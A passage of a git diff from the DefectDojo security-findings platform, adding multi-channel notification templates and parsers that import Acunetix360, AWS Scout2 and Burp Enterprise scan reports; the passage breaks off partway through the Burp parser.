    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + The new product type "{{ title }}" has been added +{% elif type == 'slack' %} + The new product type "{{ title }}" has been added. It can be viewed here: {{ url|full_url }} + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + "title": "Product Type Added", + "summary": "Product Type Added", + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + "text": "A new product type has been added.", + "facts": [ + { + "name": "Product Type:", + "value": "{{ title }}" + } + ] + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "View Product Type", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} diff --git a/dojo/templates/notifications/report_created.tpl b/dojo/templates/notifications/report_created.tpl new file mode 100644 index 00000000000..ff3269bc8f9 --- /dev/null +++ b/dojo/templates/notifications/report_created.tpl @@ -0,0 +1,82 @@ +{% if type == 'mail' %} + {% load navigation_tags %} + {% load display_tags %} + + + {% autoescape on %} +

    + Greetings, +

    +

    + Your report "{{ report.name }}" is ready. It can be downloaded here: {{ url|full_url }} +

    + Kind regards,
    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +
    +
    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + Your report "{{ report.name }}" is ready. +{% elif type == 'slack' %} + Your report "{{ report.name }}" is ready. It can be downloaded here: {{ url|full_url }} + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + "title": "Report created", + "summary": "Report created", + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + "text": "Report is ready for download.", + "facts": [ + { + "name": "Report:", + "value": "report.name" + } + ] + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "Download", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} diff --git a/dojo/templates/notifications/risk_acceptance_expiration.tpl b/dojo/templates/notifications/risk_acceptance_expiration.tpl new file mode 100644 index 00000000000..f9d3a640244 --- /dev/null +++ b/dojo/templates/notifications/risk_acceptance_expiration.tpl @@ -0,0 +1,138 @@ +{% if type == 'mail' %} + {% load navigation_tags %} + {% load display_tags %} + {% url 'view_risk_acceptance' risk_acceptance.engagement.id risk_acceptance.id as risk_acceptance_url %} + {% url 'view_product' risk_acceptance.engagement.product.id as product_url %} + {% url 'view_engagement' risk_acceptance.engagement.id as engagement_url %} + + + {% autoescape on %} +

    + Hello {{ user.get_full_name }}, +

    +

    + {{ description }} +

    + + {% if risk_acceptance.is_expired %} + Risk acceptance {{ risk_acceptance }} with {{ risk_acceptance.accepted_findings.all| length }} has expired {{ risk_acceptance.expiration_date_handled|date }} + {% else %} + Risk acceptance {{ risk_acceptance }} with {{ risk_acceptance.accepted_findings.all| length }} will expire {{ risk_acceptance.expiration_date|date }} + {% endif %} +
    + {% if risk_acceptance.reactivate_expired %} +

    Findings have been reactivated

    + {% endif %} +
    + {% if risk_acceptance.restart_sla_expired %} +

    Findings SLA start date have been reset

    + {% endif %} +
    +

    + Findings: +
    + {% for finding in risk_acceptance.accepted_findings.all %} + {% url 'view_finding' finding.id as finding_url %} + {{ finding.title }} ({{ finding.severity }}) {{ finding.status }}
    + {% empty %} + None
    + {% endfor %} +

    +

    + Kind regards, +

    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +
    +
    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + {{ description }} +{% elif type == 'slack' %} + {{ description }} + + {% if risk_acceptance.is_expired %} + Risk Acceptance Expired + {% else %} + Risk Acceptance Will Expire Soon + {% endif %} + + Risk Acceptance can be viewed here: {{ risk_acceptance_url|full_url }} + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} +{% url 'view_test' test.id as test_url %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + {% if risk_acceptance.is_expired %} + "title": "Risk Acceptance Expired", + "summary": "Risk Acceptance Expired", + {% else %} + "title": "Risk Acceptance Will Expire Soon", + "summary": "Risk Acceptance Will Expire Soon", + {% endif %} + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + {% if risk_acceptance.is_expired %} + "text": "Risk acceptance {{ risk_acceptance }} with {{ risk_acceptance.accepted_findings.all| length }} has expired {{ risk_acceptance.expiration_date_handled|date }}", + {% else %} + "text": "Risk acceptance {{ risk_acceptance }} with {{ risk_acceptance.accepted_findings.all| length }} will expire {{ risk_acceptance.expiration_date|date }}", + {% endif %} + "facts": [ + { + "name": "Product:", + "value": "{{ risk_acceptance.engagement.product.name }}" + }, + { + "name": "Engagement:", + "value": "{{ risk_acceptance.engagement.name }}" + }, + { + "name": "Risk Acceptance:", + "value": "{{ risk_acceptance }}" + } + ] + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "View Risk Acceptance", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} diff --git a/dojo/templates/notifications/scan_added.tpl b/dojo/templates/notifications/scan_added.tpl new file mode 100644 index 00000000000..b35b35b9c9b --- /dev/null +++ b/dojo/templates/notifications/scan_added.tpl @@ -0,0 +1,138 @@ +{% if type == 'mail' %} + {% load navigation_tags %} + {% load display_tags %} + {% url 'view_product' test.engagement.product.id as product_url %} + {% url 'view_engagement' test.engagement.id as engagement_url %} + {% url 'view_test' test.id as test_url %} + + + {% autoescape on %} +

    + Hello {{ user.get_full_name }}, +

    +

    + {{ description }} +

    + {{ finding_count }} findings have been updated for while a scan was uploaded: + {{product}} / {{ engagement.name }} / {{ test }}
    +
    + New findings:
    + {% for finding in findings_new %} + {% url 'view_finding' finding.id as finding_url %} + {{ finding.title }} ({{ finding.severity }})
    + {% empty %} + None
    + {% endfor %} +

    +

    + Reactivated findings:
    + {% for finding in findings_reactivated %} + {% url 'view_finding' finding.id as finding_url %} + {{ finding.title }} ({{ finding.severity }})
    + {% empty %} + None
    + {% endfor %} +

    +

    + Closed findings:
    + {% for finding in findings_mitigated %} + {% url 'view_finding' finding.id as finding_url %} + {{ finding.title }} ({{ finding.severity }})
    + {% empty %} + None
    + {% endfor %} +

    +

    + Untouched findings:
    + {% for finding in findings_untouched %} + {% url 'view_finding' finding.id as finding_url %} + {{ finding.title }} ({{ finding.severity }})
    + {% empty %} + None
    + {% endfor %} +

    +

    + Kind regards, +

    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +

    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + {{ description }} +{% elif type == 'slack' %} + {{ description }} + {% if url is not None %} + + {{ test }} results have been uploaded. + They can be viewed here: {{ url|full_url }} + {% endif %} + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} +{% url 'view_test' test.id as test_url %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + "title": "Scan added", + "summary": "Scan added", + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + "text": "A new scan has been added.", + "facts": [ + { + "name": "Product:", + "value": "{{ test.engagement.product.name }}" + }, + { + "name": "Engagement:", + "value": "{{ test.engagement.name }}" + }, + { + "name": "Scan:", + "value": "{{ test }}" + } + ] + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "View Test", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} diff --git a/dojo/templates/notifications/sla_breach.tpl b/dojo/templates/notifications/sla_breach.tpl new file mode 100644 index 00000000000..c4b0e81561b --- /dev/null +++ b/dojo/templates/notifications/sla_breach.tpl @@ -0,0 +1,121 @@ +{% if type == 'mail' %} +{% load navigation_tags %} +{% load display_tags %} +{% url 'view_finding' finding.id as finding_url %} + + + {% autoescape on %} +

    + Hello {{ user.get_full_name }}, +

    +
    +
    +

    + {% if sla_age < 0 %} + This security finding has breached its SLA. + + - Day(s) overdue: {{sla}} + {% else %} + A security finding is about to breach its SLA. + + - Day(s) remaining: {{sla}} + {% endif %} +

    +
    + - Title: {{finding.title}} +
    + - Severity: {{finding.severity}} +

    + Please refer to your SLA documentation for further guidance +

    +

    + Kind regards, +

    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +

    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + SLA breach alert for finding {{ finding.id }}. Relative days count to SLA due date: {{sla_age}}. +{% elif type == 'slack' %} + SLA breach alert for finding {{ finding.id }}. Relative days count to SLA due date: {{sla_age}}. + Title: {{finding.title}} + Severity: {{finding.severity}} + You can find details here: {{ url|full_url }} + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} +{% url 'view_finding' finding.id as finding_url %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + "title": "SLA breached", + "summary": "SLA breached", + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + "text": "A SLA for a finding has been breached.", + "facts": [ + { + "name": "Product:", + "value": "{{ finding.test.engagement.product.name }}" + }, + { + "name": "Engagement:", + "value": "{{ finding.test.engagement.name }}" + }, + { + "name": "Finding:", + "value": "{{ finding.title }}" + }, + { + "name": "Severity:", + "value": "{{ finding.severity }}" + }, + { + "name": "SLA age:", + "value": "{{ sla_age }}" + } + ] + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "View", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} diff --git a/dojo/templates/notifications/test_added.tpl b/dojo/templates/notifications/test_added.tpl new file mode 100644 index 00000000000..dc7579101d6 --- /dev/null +++ b/dojo/templates/notifications/test_added.tpl @@ -0,0 +1,100 @@ +{% if type == 'mail' %} + {% load navigation_tags %} + {% load display_tags %} + {% url 'view_product' test.engagement.product.id as product_url %} + {% url 'view_engagement' test.engagement.id as engagement_url %} + {% url 'view_test' test.id as test_url %} + + + {% autoescape on %} +

    + Hello {{ user.get_full_name }}, +

    +

    + A new test has been added: {{product}} / {{ engagement.name }} / {{ test }}
    + Finding details in the 'scan_added' email, which is a separate notification (for now). +

    +
    + Kind regards,
    +
    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +
    +
    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + New test added for engagement {{ engagement.product }}: {{ test.test_type }}. +{% elif type == 'slack' %} + New test added for engagement {{ engagement.product }}. + Title: {{test.title}} + Type: {{ test.test_type }} + You can find details here: {{ url|full_url }} + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} +{% url 'view_test' test.id as test_url %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + "title": "Test added", + "summary": "Test added", + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + "text": "A new test has been added.", + "facts": [ + { + "name": "Product:", + "value": "{{ engagement.product.name }}" + }, + { + "name": "Engagement:", + "value": "{{ engagement.name }}" + }, + { + "name": "Test:", + "value": "{{ test }}" + } + ] + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "View Test", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} diff --git a/dojo/templates/notifications/upcoming_engagement.tpl b/dojo/templates/notifications/upcoming_engagement.tpl new file mode 100644 index 00000000000..51f3b85f185 --- /dev/null +++ b/dojo/templates/notifications/upcoming_engagement.tpl @@ -0,0 +1,100 @@ +{% if type == 'mail' %} + + {% load navigation_tags %} + {% load display_tags %} + + + {% autoescape on %} +

    + Hello, +

    +

    + this is a reminder that the engagement "{{ engagement.product }}" is about to start shortly. +

    + Project start: {{ engagement.target_start }}
    + Project end: {{ engagement.target_end }}
    +
    +
    + Kind regards,
    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +
    +
    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + The engagement "{{ engagement.product }}" is starting on {{ engagement.target_start }}. +{% elif type == 'slack' %} + The engagement "{{ engagement.product }}" is starting on {{ engagement.target_start }}. + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} +{% url 'view_engagement' engagement.id as engagement_url %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + "title": "Engagement is starting", + "summary": "Engagement is starting", + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + "text": "An Engagement is starting.", + "facts": [ + { + "name": "Product:", + "value": "{{ engagement.product.name }}" + }, + { + "name": "Engagement:", + "value": "{{ engagement.name }}" + }, + { + "name": "Start date:", + "value": "{{ engagement.target_start }}" + }, + { + "name": "End date:", + "value": "{{ engagement.target_end }}" + } + ] + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "View Engagement", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} \ No newline at end of file diff --git a/dojo/templates/notifications/user_mentioned.tpl b/dojo/templates/notifications/user_mentioned.tpl new file mode 100644 index 00000000000..e2c46990456 --- /dev/null +++ b/dojo/templates/notifications/user_mentioned.tpl @@ -0,0 +1,103 @@ +{% if type == 'mail' %} + {% load navigation_tags %} + {% load display_tags %} + + + {% autoescape on %} +

    + Hello, +

    +

    + User {{ user }} jotted a note on {{ section }}:
    +
    + {{ note }}
    +
    + It can be reviewed at {{ url }} +

    + +
    +
    + Kind regards,
    + {% if system_settings.team_name %} + {{ system_settings.team_name }} + {% else %} + Defect Dojo + {% endif %} +
    +
    +

    + {% url 'notifications' as notification_url %} + You can manage your notification settings here: {{ notification_url|full_url }} +

    + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} +
    +
    + Disclaimer
    +

    {{ system_settings.disclaimer }}

    +
    + {% endif %} + {% endautoescape %} + + +{% elif type == 'alert' %} + User {{ user }} jotted a note on {{ section }}: + + {{ note }} +{% elif type == 'slack' %} + User {{ user }} jotted a note on {{ section }}: + + {{ note }} + + Full details of the note can be reviewed at {{ url }} + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + + Disclaimer: + {{ system_settings.disclaimer }} + {% endif %} +{% elif type == 'msteams' %} + { + "@context": "https://schema.org/extensions", + "@type": "MessageCard", + "title": "User Mentioned", + "summary": "User Mentioned", + "sections": [ + { + "activityTitle": "DefectDojo", + "activityImage": "https://raw.githubusercontent.com/DefectDojo/django-DefectDojo/master/dojo/static/dojo/img/chop.png", + "text": "A user has been mentioned.", + "facts": [ + { + "name": "User:", + "value": "{{ user }}" + }, + { + "name": "Section:", + "value": "{{ section }}" + }, + { + "name": "note:", + "value": "{{ note }}" + } + ] + } + {% if system_settings.disclaimer and system_settings.disclaimer.strip %} + ,{ + "activityTitle": "Disclaimer", + "text": "{{ system_settings.disclaimer }}" + } + {% endif %} + ], + "potentialAction": [ + { + "@type": "OpenUri", + "name": "View", + "targets": [ + { + "os": "default", + "uri": "{{ url|full_url }}" + } + ] + } + ] + } +{% endif %} \ No newline at end of file diff --git a/dojo/templatetags/display_tags.py b/dojo/templatetags/display_tags.py index 2d26b874be7..5235883c506 100644 --- a/dojo/templatetags/display_tags.py +++ b/dojo/templatetags/display_tags.py @@ -452,6 +452,11 @@ def file_images(obj): return get_file_images(obj, return_objects=True) +@register.filter +def file_images(obj): + return get_file_images(obj, return_objects=True) + + @register.simple_tag def severity_number_value(value): return Finding.get_number_severity(value) diff --git a/dojo/tool_config/factory.py b/dojo/tool_config/factory.py old mode 100644 new mode 100755 diff --git a/dojo/tools/acunetix360/__init__.py b/dojo/tools/acunetix360/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/acunetix360/parser.py b/dojo/tools/acunetix360/parser.py new file mode 100644 index 00000000000..987e05305f8 --- /dev/null +++ b/dojo/tools/acunetix360/parser.py @@ -0,0 +1,73 @@ +import json +import datetime +import html2text + +from dojo.models import Finding, Endpoint + + +class Acunetix360Parser(object): + + def get_scan_types(self): + return ["Acunetix360 Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Acunetix360 Scan" + + def get_description_for_scan_types(self, scan_type): + return "Acunetix360 JSON format." + + def get_findings(self, filename, test): + data = json.load(filename) + dupes = dict() + scan_date = datetime.datetime.strptime(data["Generated"], "%d/%m/%Y %H:%M %p").date() + + for item in data["Vulnerabilities"]: + title = item["Name"] + findingdetail = html2text.html2text(item.get("Description", "")) + if "Cwe" in item["Classification"]: + try: + cwe = int(item["Classification"]["Cwe"].split(',')[0]) + except: + cwe = None + else: + cwe = None + sev = item["Severity"] + if sev not in ['Info', 'Low', 'Medium', 'High', 'Critical']: + sev = 'Info' + mitigation = html2text.html2text(item.get("RemedialProcedure", "")) + references = html2text.html2text(item.get("RemedyReferences", "")) + url = item["Url"] + impact = html2text.html2text(item.get("Impact", "")) + dupe_key = title + request = item["HttpRequest"]["Content"] + if request is None or len(request) <= 0: + request = "Request Not Found" + response = item["HttpResponse"]["Content"] + if response is None or len(response) <= 0: + response = "Response Not Found" + + finding = Finding(title=title, + test=test, + description=findingdetail, + severity=sev.title(), + mitigation=mitigation, + impact=impact, + date=scan_date, + references=references, + cwe=cwe, + static_finding=True) + + if (item["Classification"] is not None) and (item["Classification"]["Cvss"] is not None) and (item["Classification"]["Cvss"]["Vector"] is not None): + finding.cvssv3 = item["Classification"]["Cvss"]["Vector"] + + finding.unsaved_req_resp = [{"req": request, "resp": response}] + finding.unsaved_endpoints = [Endpoint.from_uri(url)] + + if dupe_key in dupes: + find = dupes[dupe_key] + find.unsaved_req_resp.extend(finding.unsaved_req_resp) + find.unsaved_endpoints.extend(finding.unsaved_endpoints) + else: + dupes[dupe_key] = finding + + return list(dupes.values()) diff --git a/dojo/tools/aws_scout2/__init__.py b/dojo/tools/aws_scout2/__init__.py new file mode 100644 index 00000000000..16eb15eddb5 --- /dev/null +++ b/dojo/tools/aws_scout2/__init__.py @@ -0,0 +1 @@ +__author__ = 'Aaron Weaver' diff --git a/dojo/tools/aws_scout2/parser.py b/dojo/tools/aws_scout2/parser.py new file mode 100644 index 00000000000..b984b26aeb9 --- /dev/null +++ b/dojo/tools/aws_scout2/parser.py @@ -0,0 +1,141 @@ +import json +import textwrap +from datetime import datetime + +from dojo.models import Finding +from html2text import html2text + + +class AWSScout2Parser(object): + # FIXME bad very bad + item_data = "" + pdepth = 0 + + def get_scan_types(self): + return ["AWS Scout2 Scan"] + + def get_label_for_scan_types(self, scan_type): + return "AWS Scout2 Scan" + + def get_description_for_scan_types(self, scan_type): + return "JS file in scout2-report/inc-awsconfig/aws_config.js." + + def get_findings(self, filename, test): + content = filename.read() + if type(content) is bytes: + content = content.decode('utf-8') + raw_data = content.replace("aws_info =", "") + data = json.loads(raw_data) + find_date = datetime.now() + dupes = {} + + test_description = "" + aws_account_id = data["aws_account_id"] + test_description = "%s **AWS Account:** %s\n" % (test_description, aws_account_id) + last_run = data["last_run"] + test_description = "%s **Ruleset:** %s\n" % (test_description, last_run["ruleset_name"]) + test_description = "%s **Ruleset Description:** %s\n" % (test_description, last_run["ruleset_about"]) + test_description = "%s **Command:** %s\n" % (test_description, last_run["cmd"]) + + # Summary for AWS Services + test_description = "%s\n**AWS Services** \n\n" % (test_description) + for service, items in list(last_run["summary"].items()): + test_description = "%s\n**%s** \n" % (test_description, service.upper()) + test_description = "%s\n* **Checked Items:** %s\n" % (test_description, items["checked_items"]) + test_description = "%s* **Flagged Items:** %s\n" % (test_description, items["flagged_items"]) + test_description = "%s* **Max Level:** %s\n" % (test_description, items["max_level"]) + test_description = "%s* **Resource Count:** %s\n" % (test_description, items["resources_count"]) + test_description = "%s* **Rules Count:** %s\n\n" % (test_description, items["rules_count"]) + test.description = test_description + test.save() + + scout2_findings = [] + + # Configured AWS Services + for service in list(data["services"].items()): + for service_item in service: + if "findings" in service_item: + for name, finding in list(service_item["findings"].items()): + if finding["items"]: + description_text = "" + for name in finding["items"]: + description_text = description_text + "**Location:** " + name + "\n\n---\n" + description_text = description_text + "\n" + key = name.split('.') + i = 1 + lookup = service_item + while i < len(key): + if key[i] in lookup: + if (type(lookup[key[i]]) is dict): + lookup = lookup[key[i]] + if (key[i - 1] == "security_groups" or key[i - 1] == "PolicyDocument"): + break + i = i + 1 + + self.recursive_print(lookup) + description_text = description_text + self.item_data + self.item_data = "" + + mobsf_item = { + "category": "Mobile Permissions", + "title": finding["description"], + "severity": finding["level"], + "description": description_text + } + scout2_findings.append(mobsf_item) + + for scout2_finding in scout2_findings: + title = html2text(scout2_finding["title"]) + sev = self.getCriticalityRating(scout2_finding["severity"]) + description = scout2_finding["description"] + dupe_key = sev + title + if dupe_key in dupes: + find = dupes[dupe_key] + if description is not None: + find.description += description + else: + find = Finding(title=textwrap.shorten(title, 150), + cwe=1032, # Security Configuration Weaknesses, would like to fine tune + test=test, + description="**AWS Account:** " + aws_account_id + "\n" + description, + severity=sev, + references=None, + date=find_date, + dynamic_finding=True) + dupes[dupe_key] = find + return list(dupes.values()) + + def formatview(self, depth): + if depth > 1: + return "* " + else: + return "" + + def recursive_print(self, src, depth=0, key=''): + tabs = lambda n: ' ' * n * 2 + if isinstance(src, dict): + for key, value in src.items(): + if isinstance(src, str): + self.item_data = self.item_data + key + "\n" + self.recursive_print(value, depth + 1, key) + elif isinstance(src, list): + for litem in src: + self.recursive_print(litem, depth + 2) + else: + if self.pdepth != depth: + self.item_data = self.item_data + "\n" + if key: + self.item_data = self.item_data + self.formatview(depth) + '**%s:** %s\n\n' % (key.title(), src) + else: + self.item_data = self.item_data + self.formatview(depth) + '%s\n' % src + self.pdepth = depth + + # Criticality rating + def getCriticalityRating(self, rating): + criticality = "Info" + if rating == "warning": + criticality = "Medium" + elif rating == "danger": + criticality = "Critical" + + return criticality diff --git a/dojo/tools/burp_enterprise/__init__.py b/dojo/tools/burp_enterprise/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/burp_enterprise/parser.py b/dojo/tools/burp_enterprise/parser.py new file mode 100644 index 00000000000..8072527541c --- /dev/null +++ b/dojo/tools/burp_enterprise/parser.py @@ -0,0 +1,204 @@ +import logging +import re + +from lxml import etree + +from dojo.models import Endpoint, Finding + +logger = logging.getLogger(__name__) + + +class BurpEnterpriseParser(object): + + def get_scan_types(self): + return ["Burp Enterprise Scan"] + + def get_label_for_scan_types(self, scan_type): + return scan_type # no custom label for now + + def get_description_for_scan_types(self, scan_type): + return "Import Burp Enterprise Edition findings in HTML format" + + def get_findings(self, filename, test): + parser = etree.HTMLParser() + tree = etree.parse(filename, parser) + if tree: + return self.get_items(tree, test) + else: + return () + + def get_content(self, container): + s = '' + if container.tag == 'div' and container.text is not None and not container.text.isspace() and len(container.text) > 0: + s += ''.join(container.itertext()).strip().replace('Snip', '\n<-------------- Snip -------------->').replace('\t', '') + else: + for elem in container.iterchildren(): + if elem.text is not None and elem.text.strip() != '': + if elem.tag == 'a': + s += '(' + elem.text + ')[' + elem.attrib['href'] + ']' + '\n' + elif elem.tag == 'p': + s += elem.text + '\n' + elif elem.tag == 'li': + s += '* ' + if elem.text is not None: + s += elem.text + '\n' + elif elem.text.isspace(): + s += list(elem.itertext())[0] + elif elem.tag == 'div' or elem.tag == 'span': + s += elem.text.strip() + '\n' + else: + continue + else: + s += self.get_content(elem) + return s + + # Get the endpoints and severities associated with each vulnerability + def pre_allocate_items(self, tree): + items = list() + endpoint_text = tree.xpath("/html/body/div/div[contains(@class, 'section')]/h1") + severities = tree.xpath("/html/body/div/div[contains(@class, 'section')]/table[contains(@class, 'issue-table')]/tbody") + endpoint_text = [endpoint for endpoint in endpoint_text if ('Issues found' in ''.join(endpoint.itertext()).strip())] + + for index in range(0, len(severities)): + url = endpoint_text[index].text[16:] + sev_table = list(severities[index].iter("tr")) + + title = '' + endpoint = '' + for item in sev_table: + item_list = list(item.iter("td")) + if len(item_list) == 1: + title_list = item_list[0].text.strip().split(' ') + title = ' '.join(title_list[:-1]) + else: + endpoint = item_list[0].text.strip() + severity = item_list[1].text.strip() + vuln = dict() + vuln['Severity'] = severity + vuln['Title'] = title + vuln['Description'] = '' + vuln['Impact'] = '' + vuln['Mitigation'] = '' + vuln['References'] = '' + vuln['CWE'] = '' + vuln['Response'] = '' + vuln['Request'] = '' + vuln['Endpoint'] = [url + endpoint] + vuln['URL'] = url + items.append(vuln) + return items + + def get_items(self, tree, test): + # Check that there is at least one vulnerability (the vulnerabilities table is absent when no vuln are found) + vulns = tree.xpath("/html/body/div/div[contains(@class, 'section details')]/div[contains(@class, 'issue-container')]") + if len(vulns) == 0: + return list() + + dict_index = 0 + description = ['Issue detail:', 'Issue description'] + reqrsp = ['Request', 'Response'] + impact = ['Issue background', 'Issue remediation'] + mitigation = ['Remediation detail:', 'Remediation background'] + references = ['Vulnerability classifications', 'References'] + vuln = None + merge = False + items = self.pre_allocate_items(tree) + for issue in vulns: + elems = list(issue.iterchildren()) + curr_vuln = items[dict_index] + if vuln is None or (curr_vuln['Title'] != vuln['Title'] or curr_vuln['URL'] != vuln['URL']): + vuln = curr_vuln + merge = False + else: + if curr_vuln['Endpoint'][0] not in vuln['Endpoint']: + vuln_list = vuln['Endpoint'] + vuln_list.append(curr_vuln['Endpoint'][0]) + vuln['Endpoint'] = vuln_list + merge = True + + for index in range(3, len(elems), 2): + primary, secondary = elems[index].text.strip(), elems[index + 1] + field = self.get_content(secondary) + webinfo = primary.split(':')[0] + details = '**' + primary + '**\n' + field + '\n\n' + # Description + if primary in description: + if merge: + if field != vuln['Description'].split('\n')[1]: + vuln['Description'] = vuln['Description'] + field + '\n\n' + else: + vuln['Description'] = vuln['Description'] + details + # Impact + if primary in impact and not merge: + vuln['Impact'] = vuln['Impact'] + details + # Mitigation + if primary in mitigation and not merge: + vuln['Mitigation'] = vuln['Mitigation'] + details + # References and CWE + if primary in references and not merge: + if len(vuln['CWE']) < 1 and field.find('CWE') != -1: + vuln['CWE'] += 